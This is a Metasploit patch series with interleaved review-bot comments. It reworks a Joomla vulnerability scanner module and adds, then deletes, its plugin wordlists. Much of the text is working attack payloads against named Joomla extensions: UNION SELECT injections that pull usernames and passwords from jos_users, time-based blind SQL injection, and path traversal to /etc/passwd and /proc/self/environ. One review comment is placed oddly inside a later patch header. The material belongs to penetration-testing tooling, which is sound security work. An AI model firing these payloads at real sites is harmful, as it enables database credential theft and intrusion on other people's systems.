+index.php?option=com_huruhelpdesk&view=detail
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
+index.php?option=com_iproperty&view=agentproperties&id=
+index.php?option=com_jacomment&view=
+index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
+index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_jcommunity&controller=members&task=1'
+index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
+index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
+index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
+index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
+index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_jfuploader&Itemid=
+index.php?option=com_jgen&task=view&id=
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
+index.php?option=com_jimtawl&Itemid=12&task=
+index.php?option=com_jmarket&controller=product&task=1'
+index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
+index.php?option=com_jomdirectory&task=search&type=111+
+index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
+index.php?option=com_joomla_flash_uploader&Itemid=1
+index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
+index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
+index.php?option=com_joomtouch&controller=
+index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
+index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
+index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
+index.php?option=com_jstore&controller=product-display&task=1'
+index.php?option=com_jsubscription&controller=subscription&task=1'
+index.php?option=com_jtickets&controller=ticket&task=1'
+index.php?option=com_konsultasi&act=detail&sid=
+index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
+index.php?option=com_kunena&func=userlist&search=
+index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
+index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
+index.php?option=com_matamko&controller=
+index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
+index.php?option=com_neorecruit&task=offer_view&id=
+index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
+index.php?option=com_noticeboard&controller=
+index.php?option=com_obsuggest&controller=
+index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
+index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
+index.php?option=com_oziogallery&Itemid=
+index.php?option=com_page&id=53
+index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
+index.php?option=com_phocagallery&view=categories&Itemid=
+index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_php&file=../../../../../../../../../../etc/passwd
+index.php?option=com_php&file=../images/phplogo.jpg
+index.php?option=com_php&file=../js/ie_pngfix.js
+index.php?option=com_ponygallery&Itemid=[sqli]
+index.php?option=com_products&catid=-1
+index.php?option=com_products&id=-1
+index.php?option=com_products&product_id=-1
+index.php?option=com_products&task=category&catid=-1
+index.php?option=com_properties&task=agentlisting&aid=
+index.php?option=com_qcontacts&Itemid=1'
+index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
+index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_restaurantguide&view=country&id='&Itemid=69
+index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
+index.php?option=com_seyret&view=
+index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
+index.php?option=com_smartsite&controller=
+index.php?option=com_spa&view=spa_product&cid=
+index.php?option=com_spidercalendar
+index.php?option=com_spidercalendar&date=1'
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_staticxt&staticfile=test.php&id=1923
+index.php?option=com_szallasok&mode=8&id=25 (SQL)
+index.php?option=com_tag&task=tag&tag=
+index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
+index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
+index.php?option=com_ultimateportfolio&controller=
+index.php?option=com_users&view=registration
+index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
+index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_x-shop&action=artdetail&idd='
+index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
+index.php?option=com_xcomp&controller=../../[LFI]%00
+index.php?option=com_xvs&controller=../../[LFI]%00
+index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
+index.php?option=com_yjcontactus&view=
+index.php?option=com_youtube&id_cate=4
+index.php?option=com_zina&view=zina&Itemid=9
+index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
+index.php?search=NoGe&option=com_esearch&searchId=
+index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
+js/index.php?option=com_socialads&view=showad&Itemid=94
+libraries/joomla/utilities/compat/php50x.php
+libraries/pcl/pcltar.php
+libraries/phpmailer/phpmailer.php
+libraries/phpxmlrpc/xmlrpcs.php
+modules/mod_artuploader/upload.php");
+modules/mod_as_category.php
+modules/mod_calendar.php
+modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
+modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
+modules/mod_jfancy/script.php");
+modules/mod_ppc_simple_spotlight/elements/upload_file.php
+modules/mod_ppc_simple_spotlight/img/
+modules/mod_pxt/
+modules/mod_quick_question.php
+modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
+patch/makedown.php?arquivo=../../../../etc/passwd
+plugins/content/efup_files/helper.php");
+plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
+plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
+plugins/editors/xstandard/attachmentlibrary.php
+print.php?task=person&id=36 and 1=1
+templates/be2004-2/
+templates/ja_purity/
+wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
+web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb
index 37bfc3d173..7b497d1846 100755
--- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb
+++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb
@@ -2,7 +2,7 @@ # $Id: joomla_vulnscan.rb ## ## -#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,30 +21,30 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'Joomla Scanner', 'Description' => %q{ - This module scans a Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information, plugins and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE ) - register_options( + register_options( [ - OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", - File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt") ] ) ], self.class) end - def osfingerprint (response) + def osfingerprint(response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) - os = "*Nix" + os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end @@ -52,8 +52,7 @@ class Metasploit3 < Msf::Auxiliary return os end - def fingerprint (response, app) - + def fingerprint(response, app) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" 
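Review bot: The PLUGINS default in the `register_options` hunk now points at `data/wordlists/joomla.txt`, while the only wordlist this patch creates is `data/wordlists/pcheck.txt`; unless `joomla.txt` arrives in a later patch of the series, running with ENUMERATE left at its default tries to open a file that does not exist. Either keep the default at `"pcheck.txt"` or add `joomla.txt` in the same commit so the module works from a clean checkout. The rewritten Description line also carries over the misspelling `vulnerabilites`; it should read `vulnerabilities`.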
@@ -87,58 +86,65 @@ class Metasploit3 < Msf::Auxiliary return out end - def run_host (ip) - tpath = datastore['PATH'] - if tpath[-1,1] != '/' + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' tpath += '/' - end - apps = [ 'language/en-GB/en-GB.xml', + end + apps = [ 'languaage/en-GB/en-GB.xml', 'templates/system/css/system.css', 'media/system/js/mootools-more.js', 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] - iapps = ['robots.txt','administrator/index.php','/admin/','index.php/using-joomla/extensions/components/users-component/registration-form', + iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] - print_status("Checking Host: #{ip} for version information") + apps.each do |app| - break if check_app(tpath,app,ip) + app_status = check_app(tpath, app, ip) + return if app_status == :abort + break if app_status end - print_status("Scanning #{ip} for interesting pages") + vprint_status("#{peer} - Checking host for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning #{ip} for plugins") + vprint_status("#{peer} - Checking host for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return if not bres or not bres.body or not bres.code + return false if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end end - end - def check_app (tpath, app, ip) + def check_app(tpath, app, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << app, + 'uri' => "#{tpath}" << app, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return :abort 
if res.nil? + return false if not res or not res.body or not res.code + vprint_status("#{peer} - Checking host for version information") res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) - if (res.code.to_i == 200) + if (res.code == 200) out = fingerprint(res,app) return if not out if(out =~ /Unknown Joomla/) - print_error("Unable to identify Joomla Version with this file #{app}") + print_error("#{peer} - Unable to identify Joomla Version with this file #{app}") return false else - print_good("Joomla Version:#{out} from: #{app} ") - print_good("OS: #{os}") + print_good("#{peer} - Joomla Version:#{out} from: #{app} ") + print_good("#{peer} - OS: #{os}") report_note( :host => ip, :port => datastore['RPORT'], 
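Review bot: The first fingerprint probe in `run_host` is now spelled `'languaage/en-GB/en-GB.xml'` where the removed line had `language/`, so the most useful version file always misses and the scanner falls through to the weaker probes; restore `'language/en-GB/en-GB.xml'`. The symbol `:next_app` that `check_app` returns on success (next hunk) is what makes `break if app_status` stop the loop, so its name says the opposite of its effect; `:found` would read correctly. `File.open(datastore['PLUGINS'], 'rb').each_line` never closes the wordlist handle; `File.foreach(datastore['PLUGINS']) do |bapp|` does the same job without the leak. Both `run_host` and `check_app` continue past the end of this hunk.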
@@ -146,44 +152,50 @@ class Metasploit3 < Msf::Auxiliary :ntype => 'Joomla Version', :data => out ) - return true + return :next_app end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def scan_pages (tpath, iapp, ip) + def scan_pages(tpath, iapp, ip) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << iapp, + 'uri' => "#{tpath}" << iapp, 'method' => 'GET', }, 5) - return if not res or not res.body or not res.code + return false if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') - if (res.code.to_i == 200) + if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) - sout = "Administrator Login Page" + sout = "**Administrator Login Page" elsif(res.body =~/Registration/ and res.body 
=~/class="validate">Register<\/button>/) - sout = "Registration Page" + sout = "**Registration Page" else - sout = iapp + sout = iapp end return if not sout if(sout == iapp) - print_good("#{iapp}") - elsif print_good("#{sout}: #{iapp} ") + print_good("#{peer} - Page: #{tpath}#{iapp}") + elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") report_note( :host => ip, :port => datastore['RPORT'], 
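Review bot: In `scan_pages` the line `elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}")` uses the print call as a branch condition, so the `report_note(...)` that follows only executes if `print_good` happens to return a truthy value, which nothing here guarantees; the intent is plainly `else` with `print_good(...)` as the first statement of that branch. The 403 messages in `check_app` swapped the undefined `#{url}` for `#{ip}`, which now prints the host twice (`"#{ip} denied access to #{ip} (SSL Required)"`); the second placeholder should be the requested path, `#{tpath}#{app}`. The same duplication recurs in the 403 branches of `scan_pages` and `plugin_search` in the two hunks below, where one message has also degraded to `"#{ip} ip access to #{ip}"`. Both methods extend beyond this hunk.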
@@ -192,58 +204,64 @@ class Metasploit3 < Msf::Auxiliary :data => sout ) end - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} denied access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end - def plugin_search (tpath, papp, ip, bres) + def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => "#{datastore['PATH']}" << papp, + 'uri' => "#{tpath}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size nsize = res.body.size - if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("Found Plugin: #{papp} ") + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("Passwd not found") + vprint_error("#{peer} - Vulnerability: LFI not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("Passwd file found in response") + print_good("#{peer} - Vulnerability: Potential LFI") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("Unable to identify SQL injection") + vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("No XSS") + vprint_error("#{peer} - Vulnerability: No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("Possible XSS") + print_good("#{peer} - Vulnerability: Potential XSS") elsif(res.body =~/SQL syntax/ ) - print_good("Possible SQL Injection") + print_good("#{peer} - Vulnerability: Potential SQL Injection") elsif(papp =~/com_/) vars = papp.split('_') pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", + 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) - if (res1.code.to_i == 200) - print_good("Found Page: index.php?option=com_#{pages}") + if (res1.code == 200) + print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") else - print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") + vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end end report_note( 
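Review bot: The follow-up request `res1 = send_request_cgi(...)` in `plugin_search` is consumed as `if (res1.code == 200)` without the nil guard that protects `res` a few lines earlier, so a request that returns no response raises NoMethodError on nil, which none of the rescue clauses cover; add `return false if res1.nil?` before reading `res1.code`. The LFI verdict `papp =~/passwd/ and res.body =~/root/` treats any page containing the substring `root` as a hit, so the "Potential LFI" line will fire on ordinary HTML or JavaScript; matching the passwd record shape, e.g. `/root:.*:0:0:/`, keeps the finding meaningful. `plugin_search` continues beyond this hunk.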
@@ -253,21 +271,27 @@ class Metasploit3 < Msf::Auxiliary :ntype => 'Plugin Found', :data => papp ) - elsif(res.code.to_i == 403 and datastore['VERBOSE']) + elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - print_status("#{ip} denied access to #{url} (SSL Required)") + vprint_status("#{ip} ip access to #{ip} (SSL Required)") elsif(res.body =~ /has a list of IP addresses that are not allowed/) - print_status("#{ip} restricted access by IP") + vprint_status("#{ip} restricted access by IP") elsif(res.body =~ /SSL client certificate is required/) - print_status("#{ip} requires a SSL client certificate") + vprint_status("#{ip} requires a SSL client certificate") else - print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") end end rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return :abort rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return :abort rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return :abort end
From bf2b01f8ef53c6d185b91b071a351943e4171e92 Mon Sep 17 00:00:00 2001
From: f8lerror
Date: Thu, 24 Jan 2013 09:30:04 -0500
Subject: [PATCH 4/7] Delete a file and strip space
---
 data/wordlists/pcheck.txt | 627 ------------------
 .../auxiliary/scanner/http/joomla_vulnscan.rb | 2 +-
 2 files changed, 1 insertion(+), 628 deletions(-)
 delete mode 100755 data/wordlists/pcheck.txt
diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt
deleted file mode 100755
index b65dd2a422..0000000000
--- a/data/wordlists/pcheck.txt
+++ /dev/null
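Review bot: The `return :abort` added to each rescue clause of `plugin_search` is never examined by its caller: the wordlist loop in `run_host` (earlier hunk) calls `plugin_search(tpath,papp,ip,bres)` and discards the result, so a host that stops answering is still probed once per wordlist entry, each attempt waiting out the 5-second request timeout passed to `send_request_cgi`. Have the loop honour the value the way it already does for `check_app`, e.g. `break if plugin_search(tpath, papp, ip, bres) == :abort`; the `scan_pages` loop has the same gap. `plugin_search` begins before this hunk.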
@@ -1,627 +0,0 @@ -&controller=../../../../../../../../../../../../[LFI]%00 -?1.5.10-x -?1.5.11-x-http_ref -?1.5.11-x-php-s3lf -?1.5.3-path-disclose -?1.5.3-spam -?1.5.8-x -?1.5.9-x -?j1012-fixate-session -?option=com_mysms&Itemid=0&task=phonebook -Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png -admin/ -administrator/ -administrator/components/ -administrator/components/com_a6mambocredits/ -administrator/components/com_a6mambohelpdesk/ -administrator/components/com_admin/admin.admin.html.php -administrator/components/com_astatspro/refer.php -administrator/components/com_bayesiannaivefilter/ -administrator/components/com_chronocontact/excelwriter/PPS/File.php -administrator/components/com_colophon/ -administrator/components/com_colorlab/ -administrator/components/com_comprofiler/ -administrator/components/com_comprofiler/plugin.class.php -administrator/components/com_cropimage/admin.cropcanvas.php -administrator/components/com_extplorer/ -administrator/components/com_feederator/includes/tmsp/add_tmsp.php -administrator/components/com_googlebase/ -administrator/components/com_installer -administrator/components/com_jcs/ -administrator/components/com_jim/ -administrator/components/com_jjgallery/ -administrator/components/com_joom12pic/ -administrator/components/com_joomla-visites/ -administrator/components/com_joomla_flash_uploader/ -administrator/components/com_joomlaflashfun/ -administrator/components/com_joomlaradiov5/ -administrator/components/com_jpack/ -administrator/components/com_jreactions/ -administrator/components/com_juser/ -administrator/components/com_admin/ -administrator/components/com_kochsuite / -administrator/components/com_linkdirectory/ -administrator/components/com_livechat/getSavedChatRooms.php -administrator/components/com_livechat/xmlhttp.php -administrator/components/com_lurm_constructor/admin.lurm_constructor.php 
-administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); -administrator/components/com_mambelfish/ -administrator/components/com_mgm/ -administrator/components/com_mmp/help.mmp.php -administrator/components/com_mosmedia/ -administrator/components/com_multibanners/extadminmenus.class.php -administrator/components/com_panoramic/ -administrator/components/com_peoplebook/param.peoplebook.php -administrator/components/com_phpshop/toolbar.phpshop.html.php -administrator/components/com_remository/admin.remository.php -administrator/components/com_serverstat/install.serverstat.php -administrator/components/com_simpleswfupload/uploadhandler.php"); -administrator/components/com_swmenupro/ -administrator/components/com_treeg/ -administrator/components/com_uhp/ -administrator/components/com_uhp2/ -administrator/components/com_webring/ -administrator/components/com_wmtgallery/ -administrator/components/com_wmtportfolio/ -administrator/components/com_x-shop/ -administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ -administrator/index.php?option=com_searchlog&act=log -ajaxim/ -akocomments.php -cart?Itemid=[SQLi] -component/com__brightweblinks/ -component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 -component/osproperty/?task=agent_register -component/quran/index.php?option=com_quran&action=viewayat&surano= -components/com_ clickheat/ -components/com_5starhotels/ -components/com_Jambook/jambook.php -components/com_a6mambocredits/ -components/com_a6mambohelpdesk/ -components/com_ab_gallery/ -components/com_acajoom/ -components/com_acctexp/ -components/com_aclassf/ -components/com_activities/ -components/com_actualite/ -components/com_admin/admin.admin.html.php -components/com_advancedpoll/ -components/com_agora/ -components/com_agoragroup/ -components/com_ajaxchat/ -components/com_akobook/ -components/com_akocomment/ -components/com_akogallery 
-components/com_alberghi/ -components/com_allhotels/ -components/com_alphacontent/ -components/com_altas/ -components/com_amocourse/ -components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php -components/com_articles/ -components/com_artist/ -components/com_artlinks/ -components/com_asortyment/ -components/com_astatspro/ -components/com_awesom/ -components/com_babackup/ -components/com_banners/ -components/com_bayesiannaivefilter/ -components/com_be_it_easypartner/ -components/com_beamospetition/ -components/com_biblestudy/ -components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 -components/com_blog/ -components/com_bookflip/ -components/com_bookjoomlas/ -components/com_booklibrary/ -components/com_books/ -components/com_bsadv/ -components/com_bsq_sitestats/ -components/com_bsq_sitestats/external/rssfeed.php -components/com_bsqsitestats/ -components/com_calendar/ -components/com_camelcitydb2/ -components/com_candle/ -components/com_casino_blackjack/ -components/com_casino_videopoker/ -components/com_casinobase/ -components/com_catalogproduction/ -components/com_catalogshop/ -components/com_category/ -components/com_cgtestimonial/video.php?url="> -components/com_chronocontact/excelwriter/PPS/File.php -components/com_cinema/ -components/com_clasifier/ -components/com_classifieds/ -components/com_clickheat/ -components/com_cloner/ -components/com_cmimarketplace/ -components/com_cms/ -components/com_colophon/ -components/com_colorlab/ -components/com_competitions/ -components/com_comprofiler/ -components/com_comprofiler/plugin.class.php -components/com_contactinfo/ -components/com_content/ -components/com_cpg/cpg.php -components/com_cropimage/admin.cropcanvas.php -components/com_custompages/ -components/com_cx/ 
-components/com_d3000/ -components/com_dadamail/ -components/com_dailymessage/ -components/com_datsogallery/ -components/com_dbquery/ -components/com_detail/ -components/com_digistore/ -components/com_directory/ -components/com_djiceshoutbox/ -components/com_doc/ -components/com_downloads/ -components/com_ds-syndicate/ -components/com_dtregister/ -components/com_dv/externals/phpupload/upload.php"); -components/com_easybook/ -components/com_emcomposer/ -components/com_equotes/ -components/com_estateagent/ -components/com_eventing/ -components/com_eventlist/ -components/com_events/ -components/com_ewriting/ -components/com_expose/uploadimg.php -components/com_expshop/ -components/com_extcalendar/ -components/com_extcalendar/cal_popup.php?extmode=view&extid= -components/com_extcalendar/extcalendar.php -components/com_extended_registration/registration_detailed.inc.php -components/com_extplorer/ -components/com_ezine/ -components/com_ezstore/ -components/com_facileforms/ -components/com_fantasytournament/ -components/com_faq/ -components/com_feederator/includes/tmsp/add_tmsp.php -components/com_filebase/ -components/com_filiale/ -components/com_flashfun/ -components/com_flashmagazinedeluxe/ -components/com_flippingbook/ -components/com_flyspray/startdown.php -components/com_fm/fm.install.php -components/com_foevpartners/ -components/com_football/ -components/com_formtool/ -components/com_forum/ -components/com_fq/ -components/com_fundraiser/ -components/com_galeria/ -components/com_galleria/galleria.html.php -components/com_gallery/ -components/com_game/ -components/com_gameq/ -components/com_garyscookbook/ -components/com_genealogy/ -components/com_geoboerse/ -components/com_gigcal/ -components/com_gmaps/ -components/com_googlebase/ -components/com_gsticketsystem/ -components/com_guide/ -components/com_hashcash/server.php -components/com_hbssearch/ -components/com_hello_world/ -components/com_hotproperties/ -components/com_hotproperty/ -components/com_hotspots/ 
